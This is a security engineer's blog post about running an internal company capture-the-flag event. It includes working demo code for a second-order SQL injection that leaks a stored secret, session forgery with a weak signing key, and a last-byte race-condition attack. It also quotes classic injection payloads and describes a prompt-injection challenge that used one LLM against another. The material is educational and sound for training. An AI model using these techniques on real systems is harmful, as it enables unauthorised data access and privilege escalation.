By Tao Sauvage

Anvil has concluded another successful HammerCon for 2025. For the past three years, Anvil has organized an annual private conference for its employees. For a hybrid company with offices in Seattle and Amsterdam and remote employees worldwide, this conference is a substantial investment in team building that few companies undertake.

Each year, Anvil flies everyone out for about a week to a different destination (last year was in Seattle, USA; this year near Milan, Italy) where employees meet face-to-face, attend and deliver technical talks, build new relationships and strengthen existing ones. One highlight of this event is the Capture the Flag (CTF) security competition that has become an annual tradition. Having previously participated and won as a competitor, I volunteered to organize this year’s edition, giving last year's organizers a chance to compete again.

I ended up creating a brand new CTF from scratch which ran for 72 hours and included 16 original challenges. I prepared several categories, including web, reverse engineering, cryptography, LLM, steganography, and other miscellaneous challenges designed to test and enhance our team's security skills.

Why a CTF?

CTF competitions are widely used in cybersecurity to develop skills and explore new ways to solve problems. Personally, I've learned a substantial amount for my job by playing CTFs without even realizing it at the time. At Anvil, we find a lot of value in hosting and participating in these sorts of challenges for several reasons:

1. CTFs are a nice change of pace compared to more conventional penetration tests. Because of time restrictions and because we aim for maximum coverage during a pen test, the proofs-of-concept we produce are often limited (e.g. using alert(1) or ' OR '1'='1' payloads to demonstrate a vulnerability). By contrast, CTF participants must develop fully functional exploits, pushing their skills beyond typical proofs-of-concept. This year’s CTF had our engineers exploit a second-order SQL injection to extract the flag from a specific user, while working around length and character restrictions. They were challenged to gain a deeper understanding of SQL injections in general, which is beneficial for their career development and can help them dig deeper, faster, on future engagements.

2. CTFs provide a great playground to learn new tricks. One challenge this year involved exploiting a subtle regular-expression typo, which required participants to devise new techniques to gain code execution in the context of a Lambda function. This is a realistic scenario that we've encountered in past client engagements, and the experience gained in the CTF can be directly applied in future tests.

3. CTFs create friendly competition between all engineers that pushes them further. I could hear folks being fueled by the idea of overtaking one of their more senior colleagues on the scoreboard. Senior colleagues, in turn, felt the pressure as the gap shrank and fought to stay on top. More junior engineers often surprised me with innovative, unexpected solutions, as they approached problems without preconceived notions or reliance on familiar techniques.

4. CTFs encourage participants to explore unfamiliar security domains and provide a safe, yet challenging and focused environment to build confidence and new skills. For example, I prepared challenges that involved black-box file format analysis or reverse engineering. While some engineers are familiar with these areas of security, it's a good opportunity for others to give it a try and learn the ropes. It can demystify how complex a task is.

Overall, while CTFs are generally synthetic, with vulnerabilities and solutions specially made for the occasion, they still provide a great playground to sharpen skills and broaden exposure to multiple fields in security, which can directly translate to the day-to-day job. Maybe the next time our engineers encounter a SQL injection in a project, they will come up with an impactful proof-of-concept more quickly, or recognize its limits sooner and rate the severity of the issue more accurately.
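To make the "second-order" part of that SQL injection concrete, here is a minimal sketch in Python using an in-memory SQLite database. It is not the challenge's code: the table layout, the function names, the flag value, and the payload are all invented for illustration, and the sketch ignores the length and character restrictions that the real challenge imposed. The point it shows is that the payload is stored safely first and only becomes dangerous later, when the application reads it back and trusts it.

```python
import sqlite3


def build_db():
    # Hypothetical schema: one table holding a per-user secret.
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE users (name TEXT, secret TEXT);
        INSERT INTO users VALUES ('admin', 'FLAG{example}');
        """
    )
    return db


def register(db, name):
    # First order: the input is stored with a parameterized query,
    # so nothing is injected at this point.
    cur = db.execute("INSERT INTO users VALUES (?, ?)", (name, "nothing here"))
    return cur.lastrowid


def load_profile(db, row_id):
    # Second order: the stored name is read back and treated as trusted,
    # then concatenated into a new query. This is the vulnerable step.
    (name,) = db.execute(
        "SELECT name FROM users WHERE rowid = ?", (row_id,)
    ).fetchone()
    query = "SELECT secret FROM users WHERE name = '" + name + "'"
    return db.execute(query).fetchall()


db = build_db()

# A benign user only ever sees their own row.
benign = load_profile(db, register(db, "alice"))

# The payload is harmless when stored, and fires when the profile is loaded.
payload = "x' UNION SELECT secret FROM users WHERE name = 'admin"
leaked = load_profile(db, register(db, payload))

print(benign)  # [('nothing here',)]
print(leaked)  # [('FLAG{example}',)]
```

A payload like `' OR '1'='1` would prove the injection exists, but it would not reliably pull one specific user's secret, which is the gap between a limited proof-of-concept and a working exploit.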

I feel grateful for the opportunity to organize this year's CTF. I had tons of ideas, and the challenges that came out of them were a labor of love.

Was it a Success?

Despite initial nervousness, the CTF ran smoothly, and participants clearly enjoyed the challenges.



The scoreboard stayed exciting throughout the entire event, with the top two contestants neck-and-neck until the very end! Due to dynamic scoring (challenges decreasing in points as more participants solved them), the leaderboard changed 3 times in the last stretch, making the finish incredibly exciting. Imagine: three hours before the close, the top contenders were tied despite solving different challenges!
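For readers unfamiliar with dynamic scoring, the sketch below shows how a leaderboard can flip without either leader submitting a flag. The formula is an assumption: a quadratic decay of the kind some CTF platforms offer, not necessarily what we used. The parameters (500 initial points, 100 minimum, decay of 10 solves), the challenge names, and the players are hypothetical.

```python
import math


def dynamic_value(initial, minimum, decay, solves):
    """Points a challenge is worth after `solves` correct submissions.

    Assumed formula: the value falls quadratically from `initial`
    and is floored at `minimum` once `decay` solves are reached.
    """
    value = (minimum - initial) / (decay ** 2) * (solves ** 2) + initial
    return max(minimum, math.ceil(value))


def score(solved, solve_counts):
    # A player's score is recomputed from the current value of each
    # challenge they solved, so it can drop when others solve it too.
    return sum(dynamic_value(500, 100, 10, solve_counts[c]) for c in solved)


# How one challenge loses value as the solve count grows.
values = [dynamic_value(500, 100, 10, n) for n in (0, 1, 5, 10, 20)]

# Two hypothetical players who solved different challenges.
alice, bob = {"web"}, {"crypto"}

solve_counts = {"web": 4, "crypto": 2}
before = (score(alice, solve_counts), score(bob, solve_counts))

# Three more participants solve "crypto": Bob's score drops, Alice leads.
solve_counts["crypto"] = 5
after = (score(alice, solve_counts), score(bob, solve_counts))

print(values)  # [500, 496, 400, 100, 100]
print(before)  # (436, 484)
print(after)   # (436, 400)
```

Under these assumptions, a late solve by a third participant is enough to swap first and second place, which is what made the final hours so tense.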

The rest of the participants were still fighting hard and were not concerned about the CTF veterans taking the lead. It was heartwarming to see people still flagging challenges during the last hour.

In the end, all challenges (except one) were solved by at least two participants, which is all I could have asked for. I believe we struck the right balance: make the challenges too easy, and everyone flags them; make them too hard, and what's the point?

The Garmin reverse engineering challenge (the first of its kind!) was admittedly tough and had no solves. Still, it succeeded in inspiring participants to develop new tooling for Garmin apps in their spare time (both for Ghidra and Binary Ninja), which felt like a win in itself.

The Challenge of Creating a Challenge

It is tricky to create interesting challenges, especially when the CTF is aimed at people whose experience in the security field varies widely. It becomes even trickier when you're doing it alone.

From my point of view, there were a few qualities that all good challenges ought to have:

- Showcase an interesting vulnerability

- Teach something new (a tool or a technique)

- Be clear and concise (no guesswork or needle-in-haystack puzzles)

- Allow for creativity and alternative solutions

One extra requirement I had was for most challenges to be realistic and applicable to real projects.

Reflecting Anvil’s recommended approach, I prioritized white-box challenges, providing participants with source code and even Dockerfiles, mirroring our real-world client engagements where we are oftentimes able to compile and run code. The players were free to run the challenges locally and add debug code as they saw fit.

Testing your own challenges is tough because of the inevitable tunnel vision. Although I had a beta open for two weeks, with friends outside of the company helping with testing, I plan to rely more systematically on external feedback next year, for instance by asking for feedback on one challenge at a time, over a longer period.

In addition to asking for external help, I also put each challenge aside and came back to it much later. It gave my brain the opportunity to 'forget' about it and return with a fresh mindset. That is how I caught a devastating typo in one of my AWS CloudFormation templates, which would have resulted in a hardcoded, trivial secret key being used to sign the sessions generated by the challenge.
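To illustrate why a trivial signing key would have ruined that challenge, here is a small sketch of session forgery. Everything in it is an assumption made for the example: the use of HMAC-SHA256, the JSON payload, and the key value `changeme` are not taken from the actual challenge or template.

```python
import hashlib
import hmac
import secrets


def sign(payload: bytes, key: bytes) -> str:
    # Hypothetical session signature: HMAC-SHA256 over the raw payload.
    return hmac.new(key, payload, hashlib.sha256).hexdigest()


def verify(payload: bytes, signature: str, key: bytes) -> bool:
    # Constant-time comparison of the expected and provided signatures.
    return hmac.compare_digest(sign(payload, key), signature)


# What the typo would have deployed (hypothetical value).
WEAK_KEY = b"changeme"
# What the template was meant to deploy: a random, unguessable key.
STRONG_KEY = secrets.token_bytes(32)

# The attacker guesses the trivial key and signs an arbitrary session.
forged_payload = b'{"user": "admin"}'
forged_signature = sign(forged_payload, b"changeme")

forged_accepted = verify(forged_payload, forged_signature, WEAK_KEY)
forged_rejected = verify(forged_payload, forged_signature, STRONG_KEY)

print(forged_accepted)  # True: the server trusts the forged session
print(forged_rejected)  # False: the guess fails against a random key
```

With a guessable key, participants could have skipped the intended vulnerability entirely and signed themselves any session they liked.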

As a source of inspiration, I drew from vulnerable code snippets that I've personally seen in the past. One challenge involved a race condition when provisioning the user account, which resulted in a privilege escalation vulnerability. My solution used a Turbo Intruder script in Burp Suite. I saw a participant use raw sockets and withhold the last byte of each request to reimplement part of Turbo Intruder's trick, which is impressive considering the time constraints of the CTF.
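The "withhold the last byte" idea can be sketched in a few lines of Python. This is my own simplified illustration, not the participant's script and not how Turbo Intruder is implemented: the `/provision` path, the host header, and the tiny local server that stands in for the target are all hypothetical. The client opens several connections, sends every request minus its final byte, and then releases the final bytes back to back so that the requests complete within a very small window.

```python
import socket
import socketserver
import threading


def last_byte_sync(host, port, request, attempts):
    """Send `attempts` copies of `request` so they complete almost together."""
    conns = []
    for _ in range(attempts):
        s = socket.create_connection((host, port), timeout=5)
        # Disable Nagle's algorithm so the final byte is not delayed.
        s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
        s.sendall(request[:-1])  # everything except the final byte
        conns.append(s)
    for s in conns:  # release the withheld bytes in a tight loop
        s.sendall(request[-1:])
    replies = []
    for s in conns:
        replies.append(s.recv(4096))
        s.close()
    return replies


class Handler(socketserver.BaseRequestHandler):
    """Stand-in target: replies only once the full request has arrived."""

    def handle(self):
        data = b""
        while not data.endswith(b"\r\n\r\n"):
            chunk = self.request.recv(4096)
            if not chunk:
                return
            data += chunk
        self.request.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\nok")


# Port 0 lets the OS pick a free port for the demo server.
server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), Handler)
threading.Thread(target=server.serve_forever, daemon=True).start()
host, port = server.server_address

request = b"POST /provision HTTP/1.1\r\nHost: example\r\n\r\n"
replies = last_byte_sync(host, port, request, attempts=5)

server.shutdown()
server.server_close()
print(len(replies))
```

Because the server cannot start processing a request until its last byte arrives, most of the network jitter is paid before the race begins, which is what makes narrow race windows reachable.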

Of course, the end result doesn't always work out the way you expect. In some cases, it's great to see alternative solutions; in others, it's sad when they make the challenge trivial. For example, some participants discovered specialized tools that simplified problems I had hoped would involve manual steps. When creating the PDF challenge, I thought it would be a great opportunity for participants to learn more about the PDF file format. That was, until some participants found a tool that did it for them.

What about LLMs?

Given the rise of LLMs, the CTF was a perfect chance for me to test their capabilities practically. So far, I had only used them to write small scripts for engagements.

Using ChatGPT and DeepSeek significantly sped up writing boilerplate code and infrastructure configurations. I treated them as interns, asking questions for which I knew the answers for the most part, to avoid rabbit holes and hallucinations. LLMs saved me a ton of time and I don't think the CTF would have been ready without them.

I noted that they often struggled with less mainstream languages and nuanced exploitation techniques, confirming their current limitations in complex, real-world scenarios. For example, ChatGPT would often hallucinate JavaScript methods when writing MonkeyC code for the Garmin app.

I also included an LLM prompt injection challenge reflecting real-world trends as we are seeing LLMs being integrated more and more often by our clients. At some point, I had a custom GPT on ChatGPT to help me iterate over the prompt to solve the challenge. Using one LLM to attack another led to some interesting ideas, sped up writing the prompts, and was fun overall.

Going into the CTF, I had two solutions for that challenge. While discussing LLM-related research projects with colleagues during the conference, a third one popped into my head, and I quickly confirmed that it worked. Best of all, one contestant found a fourth solution during the CTF that played with the guardrails in ChatGPT and left me laughing for 10 minutes straight.

Lessons Learned

I've learned a few lessons along the way and I already know a few things that I'll fix for next year's CTF:

1. I was overly cautious in allocating resources to the challenges and implementing CAPTCHAs to prevent overbilling. In retrospect, I could have forgone the CAPTCHAs altogether, as the cost was negligible, and reduced the friction for the participants.

2. I was too ambitious in running the beta for all challenges at once over just two weeks. Instead, I'll consider sharing one challenge at a time over a longer period to give beta-testers more time and focus.

3. Timing the CTF itself remains challenging, as it means balancing social team-building with focused technical work. We want the competition to be fair to everyone without distracting from the rest of the conference. It's something we'll continue refining.

Regardless, I'm deeply grateful for my colleagues' participation, the energy around the CTF, the exciting finish, and the fantastic feedback I received. It went straight to my heart. I'm also still amazed by Anvil's ongoing investment in its people. I truly believe that it directly results in improving our professional abilities and company culture.

I'm excited for next year already, with lots of ideas still in my bag: HammerCon 2026, here we come!

About the Author

Tao Sauvage is a Principal Security Engineer at Anvil Secure. He loves finding vulnerabilities in anything he gets his hands on, especially when it involves embedded systems, reverse engineering and code review.

His previous research projects covered mobile OS security, resulting in multiple CVEs for Android, and wind farm equipment, with the creation of a proof-of-concept “worm” targeting Antaira systems.

He used to be a core developer of the OWASP OWTF project, an offensive web testing framework, and maintain CANToolz, a Python framework for black-box CAN bus analysis.